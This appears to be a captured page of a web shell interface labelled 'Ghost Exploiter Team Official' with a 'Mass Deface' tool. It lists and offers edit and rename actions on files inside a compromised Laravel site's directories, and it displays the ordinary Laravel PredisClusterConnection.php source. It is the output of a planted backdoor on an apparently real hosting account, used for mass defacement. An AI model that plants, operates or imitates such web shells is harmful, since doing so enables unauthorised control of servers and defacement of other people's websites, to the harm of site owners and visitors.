webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Redis
/
Connections
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Connection.php
5.086KB
edt
ren
PacksPhpRedisValues.php
4.99KB
edt
ren
PhpRedisClusterConnecti
...
0.58KB
edt
ren
PhpRedisConnection.php
13.998KB
edt
ren
PredisClusterConnection
...
0.586KB
edt
ren
PredisConnection.php
1.659KB
edt
ren
<?php namespace Illuminate\Redis\Connections; use Predis\Command\Redis\FLUSHDB; use Predis\Command\ServerFlushDatabase; class PredisClusterConnection extends PredisConnection { /** * Flush the selected Redis database on all cluster nodes. * * @return void */ public function flushdb() { $command = class_exists(ServerFlushDatabase::class) ? ServerFlushDatabase::class : FLUSHDB::class; foreach ($this->client as $node) { $node->executeCommand(tap(new $command)->setArguments(func_get_args())); } } }
<=Back
Liking